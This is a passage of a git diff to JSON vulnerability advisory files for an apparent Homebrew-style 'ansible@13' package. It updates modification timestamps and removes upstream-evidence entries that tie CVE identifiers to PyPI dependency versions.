"pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-20228.json b/advisories/BREW-ansible@13-CVE-2021-20228.json index 07dccbd83d..bab4178841 100644 --- a/advisories/BREW-ansible@13-CVE-2021-20228.json +++ b/advisories/BREW-ansible@13-CVE-2021-20228.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-20228", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-5rrg-rr89-x9mv", "CVE-2021-20228", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-20270.json b/advisories/BREW-ansible@13-CVE-2021-20270.json index c8880c36d7..3ec1201af2 100644 --- a/advisories/BREW-ansible@13-CVE-2021-20270.json +++ b/advisories/BREW-ansible@13-CVE-2021-20270.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-20270", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-9w8r-397f-prfh", "CVE-2021-20270", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-21330.json b/advisories/BREW-ansible@13-CVE-2021-21330.json index 31e6da1db9..b0b82b0f19 100644 --- a/advisories/BREW-ansible@13-CVE-2021-21330.json +++ b/advisories/BREW-ansible@13-CVE-2021-21330.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-21330", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-v6wp-4m6f-gcjg", "CVE-2021-21330", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-27291.json b/advisories/BREW-ansible@13-CVE-2021-27291.json index 61dfd39d21..7469c896b3 100644 --- a/advisories/BREW-ansible@13-CVE-2021-27291.json +++ b/advisories/BREW-ansible@13-CVE-2021-27291.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-27291", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-pq64-v7f5-gqh8", "CVE-2021-27291", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-28363.json b/advisories/BREW-ansible@13-CVE-2021-28363.json index fdb9767adf..01c315706c 100644 --- a/advisories/BREW-ansible@13-CVE-2021-28363.json +++ b/advisories/BREW-ansible@13-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-28363", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-28957.json b/advisories/BREW-ansible@13-CVE-2021-28957.json index 811de74906..e87d04a8c8 100644 --- a/advisories/BREW-ansible@13-CVE-2021-28957.json +++ b/advisories/BREW-ansible@13-CVE-2021-28957.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-28957", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jq4v-f5q6-mjqq", "CVE-2021-28957", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-33503.json b/advisories/BREW-ansible@13-CVE-2021-33503.json index 470a28bec4..a41d053cb2 100644 --- a/advisories/BREW-ansible@13-CVE-2021-33503.json +++ b/advisories/BREW-ansible@13-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-33503", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-3583.json b/advisories/BREW-ansible@13-CVE-2021-3583.json index 9a1f16054a..04aadb98c9 100644 --- a/advisories/BREW-ansible@13-CVE-2021-3583.json +++ b/advisories/BREW-ansible@13-CVE-2021-3583.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-3583", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-2pfh-q76x-gwvm", "CVE-2021-3583", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-3620.json b/advisories/BREW-ansible@13-CVE-2021-3620.json index 794925553b..ec2e0ecada 100644 --- a/advisories/BREW-ansible@13-CVE-2021-3620.json +++ b/advisories/BREW-ansible@13-CVE-2021-3620.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-3620", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-4r65-35qq-ch8j", "CVE-2021-3620", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-43818.json b/advisories/BREW-ansible@13-CVE-2021-43818.json index a1fdc004c1..527e26cb74 100644 --- a/advisories/BREW-ansible@13-CVE-2021-43818.json +++ b/advisories/BREW-ansible@13-CVE-2021-43818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-43818", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-55x5-fj6c-h6m8", "CVE-2021-43818", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2021-46823.json b/advisories/BREW-ansible@13-CVE-2021-46823.json index 6fa8b91a59..56e727dce4 100644 --- a/advisories/BREW-ansible@13-CVE-2021-46823.json +++ b/advisories/BREW-ansible@13-CVE-2021-46823.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2021-46823", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-qfr5-wjpw-q4c4", "CVE-2021-46823", @@ -43,22 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-ldap", - "subject_version": "3.4.7", - "key": "pkg:pypi/python-ldap@3.4.7", - "resource": "python-ldap" - }, - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-ldap", - "subject_version": "3.4.7", - "key": "pkg:pypi/python-ldap@3.4.7", - "resource": "python-ldap" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2022-0718.json b/advisories/BREW-ansible@13-CVE-2022-0718.json index 3b7dee7535..d73ba612b0 100644 --- a/advisories/BREW-ansible@13-CVE-2022-0718.json +++ b/advisories/BREW-ansible@13-CVE-2022-0718.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2022-0718", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-wmqq-r32m-87c5", "CVE-2022-0718", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "oslo-utils", - "subject_version": "10.1.1", - "key": "pkg:pypi/oslo-utils@10.1.1", - "resource": "oslo-utils" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2022-2309.json b/advisories/BREW-ansible@13-CVE-2022-2309.json index e94a5affbb..96098c58ce 100644 --- a/advisories/BREW-ansible@13-CVE-2022-2309.json +++ b/advisories/BREW-ansible@13-CVE-2022-2309.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2022-2309", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-wrxv-2j5q-m38w", "CVE-2022-2309", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2022-24302.json b/advisories/BREW-ansible@13-CVE-2022-24302.json index 5143723434..5578cd2461 100644 --- a/advisories/BREW-ansible@13-CVE-2022-24302.json +++ b/advisories/BREW-ansible@13-CVE-2022-24302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2022-24302", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-f8q4-jwww-x3wv", "CVE-2022-24302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2022-36087.json b/advisories/BREW-ansible@13-CVE-2022-36087.json index fff5b8834b..830d3eabfe 100644 --- a/advisories/BREW-ansible@13-CVE-2022-36087.json +++ b/advisories/BREW-ansible@13-CVE-2022-36087.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2022-36087", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-3pgj-pg6c-r5p7", "CVE-2022-36087", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "oauthlib", - "subject_version": "3.3.1", - "key": "pkg:pypi/oauthlib@3.3.1", - "resource": "oauthlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2022-3697.json b/advisories/BREW-ansible@13-CVE-2022-3697.json index 1c72ab5575..1144d9221e 100644 --- a/advisories/BREW-ansible@13-CVE-2022-3697.json +++ b/advisories/BREW-ansible@13-CVE-2022-3697.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2022-3697", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-cpx3-93w7-457x", "CVE-2022-3697", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2022-40896.json b/advisories/BREW-ansible@13-CVE-2022-40896.json index b54736ea14..4f167fb145 100644 --- a/advisories/BREW-ansible@13-CVE-2022-40896.json +++ b/advisories/BREW-ansible@13-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2022-40896", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2022-40897.json b/advisories/BREW-ansible@13-CVE-2022-40897.json index f488246e8c..18019e436e 100644 --- a/advisories/BREW-ansible@13-CVE-2022-40897.json +++ b/advisories/BREW-ansible@13-CVE-2022-40897.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2022-40897", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-r9hx-vwmv-q579", "BIT-setuptools-2022-40897", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "setuptools", - "subject_version": "83.0.0", - "key": "pkg:pypi/setuptools@83.0.0", - "resource": "setuptools" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-26302.json b/advisories/BREW-ansible@13-CVE-2023-26302.json index 5961e1203f..96277e4d1b 100644 --- a/advisories/BREW-ansible@13-CVE-2023-26302.json +++ b/advisories/BREW-ansible@13-CVE-2023-26302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-26302", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jrwr-5x3p-hvc3", "CVE-2023-26302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-26303.json b/advisories/BREW-ansible@13-CVE-2023-26303.json index 18dc21397d..e51810b58b 100644 --- a/advisories/BREW-ansible@13-CVE-2023-26303.json +++ b/advisories/BREW-ansible@13-CVE-2023-26303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-26303", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-vrjv-mxr7-vjf8", "CVE-2023-26303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-29483.json b/advisories/BREW-ansible@13-CVE-2023-29483.json index 68d6a73565..538ca51ef5 100644 --- a/advisories/BREW-ansible@13-CVE-2023-29483.json +++ b/advisories/BREW-ansible@13-CVE-2023-29483.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-29483", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-3rq5-2g8h-59hc", "CVE-2023-29483", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "dnspython", - "subject_version": "2.8.0", - "key": "pkg:pypi/dnspython@2.8.0", - "resource": "dnspython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-32681.json b/advisories/BREW-ansible@13-CVE-2023-32681.json index ed4f864e9e..91b56db233 100644 --- a/advisories/BREW-ansible@13-CVE-2023-32681.json +++ b/advisories/BREW-ansible@13-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-32681", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-37276.json b/advisories/BREW-ansible@13-CVE-2023-37276.json index cf092d24b4..f62a0e288f 100644 --- a/advisories/BREW-ansible@13-CVE-2023-37276.json +++ b/advisories/BREW-ansible@13-CVE-2023-37276.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-37276", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-45c4-8wx5-qw6w", "CVE-2023-37276", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-4237.json b/advisories/BREW-ansible@13-CVE-2023-4237.json index 99a14f86d0..847f9947c8 100644 --- a/advisories/BREW-ansible@13-CVE-2023-4237.json +++ b/advisories/BREW-ansible@13-CVE-2023-4237.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-4237", "published": "2026-08-13T16:35:22Z", - "modified": "2026-09-03T08:45:29Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-ww3m-ffrm-qvqv", "CVE-2023-4237", @@ -41,14 +41,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible-core", - "subject_version": "2.20.7", - "key": "pkg:pypi/ansible-core@2.20.7", - "resource": "ansible-core" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-43804.json b/advisories/BREW-ansible@13-CVE-2023-43804.json index 7fd831606a..e795e20023 100644 --- a/advisories/BREW-ansible@13-CVE-2023-43804.json +++ b/advisories/BREW-ansible@13-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-43804", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-45803.json b/advisories/BREW-ansible@13-CVE-2023-45803.json index cf996e2b70..f66a6aa39c 100644 --- a/advisories/BREW-ansible@13-CVE-2023-45803.json +++ b/advisories/BREW-ansible@13-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-45803", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-47627.json b/advisories/BREW-ansible@13-CVE-2023-47627.json index 07ecf9c9bb..b02a3c805a 100644 --- a/advisories/BREW-ansible@13-CVE-2023-47627.json +++ b/advisories/BREW-ansible@13-CVE-2023-47627.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-47627", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-gfw2-4jvh-wgfg", "CVE-2023-47627", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-47641.json b/advisories/BREW-ansible@13-CVE-2023-47641.json index 6e41a0fa93..5e2404f5c2 100644 --- a/advisories/BREW-ansible@13-CVE-2023-47641.json +++ b/advisories/BREW-ansible@13-CVE-2023-47641.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-47641", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-xx9p-xxvh-7g8j", "CVE-2023-47641", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-48795.json b/advisories/BREW-ansible@13-CVE-2023-48795.json index d6553f2876..fd26df54bd 100644 --- a/advisories/BREW-ansible@13-CVE-2023-48795.json +++ b/advisories/BREW-ansible@13-CVE-2023-48795.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-48795", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-45x7-px36-x8w8", "CVE-2023-48795", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "paramiko", - "subject_version": "5.0.0", - "key": "pkg:pypi/paramiko@5.0.0", - "resource": "paramiko" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-49081.json b/advisories/BREW-ansible@13-CVE-2023-49081.json index ef94c8f796..47b7e952f5 100644 --- a/advisories/BREW-ansible@13-CVE-2023-49081.json +++ b/advisories/BREW-ansible@13-CVE-2023-49081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-49081", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-q3qx-c6g2-7pw2", "CVE-2023-49081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-49082.json b/advisories/BREW-ansible@13-CVE-2023-49082.json index 12fabae86a..1706cac3fc 100644 --- a/advisories/BREW-ansible@13-CVE-2023-49082.json +++ b/advisories/BREW-ansible@13-CVE-2023-49082.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-49082", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-qvrw-v9rv-5rjx", "CVE-2023-49082", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-5115.json b/advisories/BREW-ansible@13-CVE-2023-5115.json index 44c731d375..982220af33 100644 --- a/advisories/BREW-ansible@13-CVE-2023-5115.json +++ b/advisories/BREW-ansible@13-CVE-2023-5115.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-5115", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-jpvw-p8pr-9g2x", "CVE-2023-5115", @@ -40,13 +40,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible", - "subject_version": "13.8.0", - "key": "pkg:pypi/ansible@13.8.0" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2023-5764.json b/advisories/BREW-ansible@13-CVE-2023-5764.json index 51054d0ee9..9817af4d42 100644 --- a/advisories/BREW-ansible@13-CVE-2023-5764.json +++ b/advisories/BREW-ansible@13-CVE-2023-5764.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2023-5764", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": "2026-09-10T18:51:29Z", "upstream": [ "GHSA-7j69-qfc3-2fq9", "CVE-2023-5764", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "ansible-core", - "subject_version": "2.20.7", - "key": "pkg:pypi/ansible-core@2.20.7", - "resource": "ansible-core" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-ansible@13-CVE-2024-0690.json b/advisories/BREW-ansible@13-CVE-2024-0690.json index 1b839644d7..ae3d851b61 100644 --- a/advisories/BREW-ansible@13-CVE-2024-0690.json +++ b/advisories/BREW-ansible@13-CVE-2024-0690.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-ansible@13-CVE-2024-0690", "published": "2026-08-13T16:35:22Z", - "modified": "2026-08-13T16:35:22Z", + "modified": 